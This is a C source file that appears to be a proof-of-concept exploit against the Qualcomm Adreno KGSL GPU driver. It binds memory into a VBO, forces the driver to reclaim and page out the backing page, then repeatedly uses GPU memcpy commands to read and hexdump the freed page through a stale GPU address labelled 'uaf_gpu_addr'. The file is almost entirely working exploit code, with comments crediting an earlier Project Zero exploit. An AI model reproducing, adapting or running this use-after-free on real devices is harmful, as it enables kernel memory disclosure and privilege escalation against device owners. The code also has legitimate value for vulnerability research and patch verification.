#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <stdarg.h>
#include <poll.h>
#include <fcntl.h>
#include <ctype.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <stdint.h>
#include <stdbool.h>
#include <stdlib.h>
#include <assert.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
    unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
            16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}


#define KGSL_IOC_TYPE 0x09
enum kgsl_user_mem_type {
  KGSL_USER_MEM_TYPE_PMEM   = 0x00000000,
  KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,
  KGSL_USER_MEM_TYPE_ADDR   = 0x00000002,
  KGSL_USER_MEM_TYPE_ION    = 0x00000003,
  KGSL_USER_MEM_TYPE_DMABUF       = 0x00000003,
  KGSL_USER_MEM_TYPE_MAX    = 0x00000007,
};

struct kgsl_gpumem_alloc {
  unsigned long gpuaddr; /* output param */
  size_t size;
  unsigned int flags;
};
#define KGSL_MEMALIGN_SHIFT   16
#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
#define KGSL_MEMFLAGS_IOCOHERENT  0x80000000ULL
#define KGSL_MEMFLAGS_SECURE      0x00000008ULL
#define KGSL_MEMFLAGS_VBO         (1ULL << 34)
#define KGSL_CACHEMODE_SHIFT 26
#define KGSL_CACHEMODE_WRITECOMBINE 0
#define KGSL_CACHEMODE_UNCACHED 1
#define KGSL_CACHEMODE_WRITETHROUGH 2
#define KGSL_CACHEMODE_WRITEBACK 3
#define KGSL_MEMTYPE_SHIFT    8
#define KGSL_MEMTYPE_OBJECTANY      0
#define IOCTL_KGSL_GPUMEM_ALLOC \
  _IOWR(KGSL_IOC_TYPE, 0x2f, struct kgsl_gpumem_alloc)
unsigned long gpumem_alloc(int kgsl_fd, size_t size, unsigned int flags) {
  struct kgsl_gpumem_alloc kga = { .size = size, .flags = flags };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPUMEM_ALLOC, &kga));
  return kga.gpuaddr;
}

struct kgsl_gpuobj_alloc {
  __u64 size;
  __u64 flags;
  __u64 va_len;
  __u64 mmapsize;
  unsigned int id;
  unsigned int metadata_len;
  __u64 metadata;
};
#define IOCTL_KGSL_GPUOBJ_ALLOC \
  _IOWR(KGSL_IOC_TYPE, 0x45, struct kgsl_gpuobj_alloc)
uint64_t gpuobj_alloc(int kgsl_fd, size_t size, uint64_t flags) {
  struct kgsl_gpuobj_alloc arg = { .size = size, .flags = flags, .va_len = size };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_ALLOC, &arg));
  return arg.id;
}

struct kgsl_gpumem_bind_range {
  __u64 child_offset;
  __u64 target_offset;
  __u64 length;
  __u32 child_id;
  __u32 op;
#define KGSL_GPUMEM_RANGE_OP_BIND 1
#define KGSL_GPUMEM_RANGE_OP_UNBIND 2
};
struct kgsl_gpumem_bind_ranges {
  __u64 ranges;
  __u32 ranges_nents;
  __u32 ranges_size;
  __u32 id;
  __u32 flags;
  int fence_id;
  /* private: 64 bit compatibility */
  __u32 padding;
};
#define IOCTL_KGSL_GPUMEM_BIND_RANGES \
  _IOWR(KGSL_IOC_TYPE, 0x56, struct kgsl_gpumem_bind_ranges)

struct kgsl_gpuobj_info {
  __u64 gpuaddr;
  __u64 flags;
  __u64 size;
  __u64 va_len;
  __u64 va_addr;
  unsigned int id;
};
#define IOCTL_KGSL_GPUOBJ_INFO \
  _IOWR(KGSL_IOC_TYPE, 0x47, struct kgsl_gpuobj_info)
uint64_t get_gpuaddr(int kgsl_fd, unsigned int id) {
  struct kgsl_gpuobj_info arg = { .id = id };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_INFO, &arg));
  return arg.gpuaddr;
}

/* --- context flags --- */
#define KGSL_CONTEXT_SAVE_GMEM    0x00000001
#define KGSL_CONTEXT_NO_GMEM_ALLOC  0x00000002
/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
#define KGSL_CONTEXT_SUBMIT_IB_LIST 0x00000004
#define KGSL_CONTEXT_CTX_SWITCH   0x00000008
#define KGSL_CONTEXT_PREAMBLE   0x00000010
#define KGSL_CONTEXT_TRASH_STATE  0x00000020
#define KGSL_CONTEXT_PER_CONTEXT_TS 0x00000040
#define KGSL_CONTEXT_USER_GENERATED_TS  0x00000080
/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
#define KGSL_CONTEXT_END_OF_FRAME 0x00000100
#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
#define KGSL_CONTEXT_SYNC               0x00000400
#define KGSL_CONTEXT_PWR_CONSTRAINT     0x00000800
#define KGSL_CONTEXT_PRIORITY_MASK      0x0000F000
#define KGSL_CONTEXT_PRIORITY_SHIFT     12
#define KGSL_CONTEXT_PRIORITY_UNDEF     0

#define KGSL_CONTEXT_IFH_NOP            0x00010000
#define KGSL_CONTEXT_SECURE             0x00020000
#define KGSL_CONTEXT_NO_SNAPSHOT        0x00040000
#define KGSL_CONTEXT_SPARSE             0x00080000
#define KGSL_CONTEXT_FAULT_INFO     0x40000000

#define KGSL_CONTEXT_PREEMPT_STYLE_MASK       0x0E000000
#define KGSL_CONTEXT_PREEMPT_STYLE_SHIFT      25
#define KGSL_CONTEXT_PREEMPT_STYLE_DEFAULT    0x0
#define KGSL_CONTEXT_PREEMPT_STYLE_RINGBUFFER 0x1
#define KGSL_CONTEXT_PREEMPT_STYLE_FINEGRAIN  0x2

#define KGSL_CONTEXT_TYPE_MASK          0x01F00000
#define KGSL_CONTEXT_TYPE_SHIFT         20
#define KGSL_CONTEXT_TYPE_ANY   0
#define KGSL_CONTEXT_TYPE_GL    1
#define KGSL_CONTEXT_TYPE_CL    2
#define KGSL_CONTEXT_TYPE_C2D   3
#define KGSL_CONTEXT_TYPE_RS    4
#define KGSL_CONTEXT_TYPE_VK    5
#define KGSL_CONTEXT_TYPE_UNKNOWN 0x1E

#define KGSL_CONTEXT_INVALIDATE_ON_FAULT 0x10000000
#define KGSL_CONTEXT_FAULT_INFO     0x40000000
#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200

struct kgsl_drawctxt_create {
  unsigned int flags; // KGSL_CONTEXT_* bitmask
  unsigned int drawctxt_id; /*output param */
};
#define IOCTL_KGSL_DRAWCTXT_CREATE \
  _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
// https://github.com/robclark/kilroy/blob/master/kgsl.c uses:
//  - KGSL_CONTEXT_NO_GMEM_ALLOC
//  - KGSL_CONTEXT_PREAMBLE
//  - KGSL_CONTEXT_PER_CONTEXT_TS
//  - KGSL_CONTEXT_USER_GENERATED_TS
//  - 1 << KGSL_CONTEXT_PRIORITY_SHIFT
//  - KGSL_CONTEXT_TYPE_GL << KGSL_CONTEXT_TYPE_SHIFT
//
// adrenaline uses:
//  - KGSL_CONTEXT_NO_GMEM_ALLOC
//  - KGSL_CONTEXT_PREAMBLE
//  - KGSL_CONTEXT_PWR_CONSTRAINT
//  - 1 << KGSL_CONTEXT_PRIORITY_SHIFT
//
// driver requires:
//  - KGSL_CONTEXT_PREAMBLE
//  - KGSL_CONTEXT_NO_GMEM_ALLOC
uint32_t drawctxt_create(int kgsl_fd, unsigned int flags) {
  struct kgsl_drawctxt_create arg = {
    .flags = flags | KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC
  };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &arg));
  return arg.drawctxt_id;
}

struct kgsl_command_object {
  uint64_t offset;
  uint64_t gpuaddr;
  uint64_t size;
  unsigned int flags;
  unsigned int id;
};
#define KGSL_CMDLIST_IB             0x00000001U
struct kgsl_gpu_command {
  uint64_t flags;
  uint64_t cmdlist;
  unsigned int cmdsize;
  unsigned int numcmds;
  uint64_t objlist;
  unsigned int objsize;
  unsigned int numobjs;
  uint64_t synclist;
  unsigned int syncsize;
  unsigned int numsyncs;
  unsigned int context_id;
  unsigned int timestamp;
};
#define IOCTL_KGSL_GPU_COMMAND \
  _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command)
struct kgsl_timestamp_event {
  int type;                /* Type of event (see list below) */
  unsigned int timestamp;  /* Timestamp to trigger event on */
  unsigned int context_id; /* Context for the timestamp */
  void *priv;  /* Pointer to the event specific blob */
  size_t len;              /* Size of the event specific blob */
};
#define KGSL_TIMESTAMP_EVENT_FENCE 2
struct kgsl_timestamp_event_fence {
  int fence_fd; /* Fence to signal */
};
#define IOCTL_KGSL_TIMESTAMP_EVENT \
  _IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)
void gpu_command(int kgsl_fd, uint32_t ctx_id, unsigned long gpuaddr, int size) {
  struct kgsl_command_object cmd = {
    .gpuaddr = gpuaddr,
    .size = size,
    .flags = KGSL_CMDLIST_IB
  };
  struct kgsl_gpu_command req = {
    .flags = KGSL_CONTEXT_SUBMIT_IB_LIST,
    .cmdlist = (unsigned long)&cmd,
    .cmdsize = sizeof(struct kgsl_command_object),
    .numcmds = 1,
    .context_id = ctx_id,
  };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPU_COMMAND, &req));

  struct kgsl_timestamp_event_fence tef = { .fence_fd = -1 };
  struct kgsl_timestamp_event tse = {
    .type = KGSL_TIMESTAMP_EVENT_FENCE,
    .timestamp = req.timestamp,
    .context_id = ctx_id,
    .priv = &tef,
    .len = sizeof(tef)
  };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &tse));
  assert(tef.fence_fd != -1);
  struct pollfd pollfd = { .fd = tef.fence_fd, .events = POLLIN };
  SYSCHK(poll(&pollfd, 1, -1));
  close(tef.fence_fd);
}


// START HEADERS FOR GPU COMMANDS
// parts copied from hawkes' old exploit
// https://bugs.chromium.org/p/project-zero/issues/detail?id=2052
// also some definitions from https://github.com/robclark/kilroy/

#define CP_TYPE0_PKT  (0 << 30)
#define CP_TYPE3_PKT  (3 << 30)
#define CP_TYPE4_PKT  (4 << 28)
#define CP_TYPE7_PKT  (7 << 28)

#define CP_NOP                  0x10
#define CP_WAIT_FOR_ME          0x13
#define CP_WAIT_FOR_IDLE        0x26
#define CP_WAIT_REG_MEM         0x3c
#define CP_MEM_WRITE            0x3d
#define CP_REG_TO_MEM   0x3e
#define CP_INDIRECT_BUFFER_PFE  0x3f
#define CP_SET_DRAW_STATE       0x43
#define CP_MEM_TO_MEM           0x73

#define CP_WAIT_MEM_WRITES     0x12

#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16))
#define lower_32_bits(n) ((uint32_t)(n))

static inline uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr)
{
    uint *start = cmds;

    *cmds++ = lower_32_bits(gpuaddr);
    *cmds++ = upper_32_bits(gpuaddr);

    return cmds - start;
}

static inline uint pm4_calc_odd_parity_bit(uint val) {
    return (0x9669 >> (0xf & ((val) ^
                              ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^
                              ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^
                              ((val) >> 28)))) & 1;
}

static inline uint cp_type7_packet(uint opcode, uint cnt) {
    return CP_TYPE7_PKT | ((cnt) << 0) |
           (pm4_calc_odd_parity_bit(cnt) << 15) |
           (((opcode) & 0x7F) << 16) |
           ((pm4_calc_odd_parity_bit(opcode) << 23));
}

static inline uint cp_type3_packet(uint opcode, uint cnt) {
  return ((cnt-1) << 16) | ((opcode & 0xff) << 8) | CP_TYPE3_PKT;
}

static inline uint cp_type4_packet(uint opcode, uint cnt)
{
  return CP_TYPE4_PKT | ((cnt) << 0) |
  (pm4_calc_odd_parity_bit(cnt) << 7) |
  (((opcode) & 0x3FFFF) << 8) |
  ((pm4_calc_odd_parity_bit(opcode) << 27));
}
// END HEADERS FOR GPU COMMANDS


uint32_t *emit_gpu_memcpy(uint32_t *cmds, unsigned long dst, unsigned long src, unsigned long len) {
  if (len % 4 != 0)
    errx(1, "gpu memcpy for non-multiple-of-4 length");
  for (unsigned long i = 0; i < len; i += 4) {
    *cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);
    *cmds++ = 0;
    cmds += cp_gpuaddr(cmds, dst + i); /* destination */
    cmds += cp_gpuaddr(cmds, src + i); /* source */
  }
  return cmds;
}


char *systemf(const char *command, ...) {
  char *full_command;
  va_list ap;
  va_start(ap, command);
  SYSCHK(vasprintf(&full_command, command, ap));
  va_end(ap);
  printf("systemf: <<<%s>>>\n", full_command);
  FILE *child_stream = popen(full_command, "r");
  char *result = NULL;
  size_t result_size = 0;
  errno = 0;
  if (getdelim(&result, &result_size, '\0', child_stream) == -1 && errno != 0)
    errx(1, "getdelim reported error");
  if (pclose(child_stream))
    errx(1, "pclose reported error");
  if (result) {
    if (result[0] != '\0' && result[strlen(result)-1] == '\n')
      result[strlen(result)-1] = '\0';
    puts(result);
    puts("================================\n");
  }
  free(full_command);
  return result ? result : strdup("");
}

int main(void) {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  printf("pid: %d\n", getpid());

  int kgsl_fd = SYSCHK(open("/dev/kgsl-3d0", O_RDWR));

  unsigned long vbo_id = gpuobj_alloc(kgsl_fd, 0x4000, KGSL_MEMFLAGS_VBO);
  printf("vbo_id=%lu\n", vbo_id);

  unsigned long child_id = gpuobj_alloc(kgsl_fd, 0x1000, 0);
  char *child_vma = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, kgsl_fd, child_id << 12));

  //unsigned long normal_gpuaddr = gpumem_alloc(kgsl_fd, 0x3000, (2<<KGSL_MEMALIGN_SHIFT) | KGSL_MEMFLAGS_USE_CPU_MAP | (KGSL_CACHEMODE_WRITEBACK << KGSL_CACHEMODE_SHIFT) | (KGSL_MEMTYPE_OBJECTANY << KGSL_MEMTYPE_SHIFT) | KGSL_MEMFLAGS_IOCOHERENT);
  //char *normal = SYSCHK(mmap(NULL, 0x3000, PROT_READ|PROT_WRITE, MAP_SHARED, kgsl_fd, normal_gpuaddr));

  printf("send bind request\n");
  {
    struct kgsl_gpumem_bind_range ranges[] = {
      { .child_offset = 0, .target_offset = 0, .length = 0x1000, .child_id = child_id, .op = KGSL_GPUMEM_RANGE_OP_BIND }
    };
    struct kgsl_gpumem_bind_ranges bind_arg = {
      .ranges = (unsigned long)ranges,
      .ranges_nents = sizeof(ranges)/sizeof(ranges[0]),
      .ranges_size = sizeof(ranges[0]),
      .id = vbo_id,
      .flags = 0
    };
    SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPUMEM_BIND_RANGES, &bind_arg));
  }
  printf("bind done\n");
  sleep(1);

  systemf("echo background > /sys/class/kgsl/kgsl/proc/%d/state", getpid());
  systemf("echo 3 > /proc/sys/vm/drop_caches");

  while (1) {
    unsigned long reclaimed = strtoul(systemf("cat /sys/class/kgsl/kgsl/proc/%d/gpumem_reclaimed", getpid()), NULL, 0);
    if (reclaimed != 0)
      break;
    sleep(1);
  }

  *(volatile char *)child_vma;
  SYSCHK(madvise(child_vma, 0x1000, MADV_PAGEOUT));
  sleep(3);

  systemf("grep . /sys/class/kgsl/kgsl/proc/%d/gpumem_*", getpid());

  unsigned long uaf_gpu_addr = get_gpuaddr(kgsl_fd, vbo_id);

  unsigned long normal_gpuaddr = gpumem_alloc(kgsl_fd, 0x50000, (2<<KGSL_MEMALIGN_SHIFT) | KGSL_MEMFLAGS_USE_CPU_MAP | (KGSL_CACHEMODE_WRITEBACK << KGSL_CACHEMODE_SHIFT) | (KGSL_MEMTYPE_OBJECTANY << KGSL_MEMTYPE_SHIFT) | KGSL_MEMFLAGS_IOCOHERENT);
  // 15: we get preempted
  // 1: we preempt
  uint32_t drawctxt_normal = drawctxt_create(kgsl_fd, (1<<KGSL_CONTEXT_PRIORITY_SHIFT));
  printf("drawctxt_normal = %u\n", drawctxt_normal);

  char *normal = SYSCHK(mmap(NULL, 0x50000, PROT_READ|PROT_WRITE, MAP_SHARED, kgsl_fd, normal_gpuaddr));
  memset(normal, 'F', 0x50000);
  while (1) {
    uint32_t *cmds = (void*)normal;
    cmds = emit_gpu_memcpy(cmds, normal_gpuaddr + 0x8000, uaf_gpu_addr, 0x1000);
    *cmds++ = cp_type7_packet(CP_WAIT_MEM_WRITES, 0);
    *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0);
    gpu_command(kgsl_fd, drawctxt_normal, normal_gpuaddr, (cmds - (uint32_t*)normal) * 4);

    hexdump(normal+0x8000, 0x1000);

    sleep(1);
  }

  return 0;
}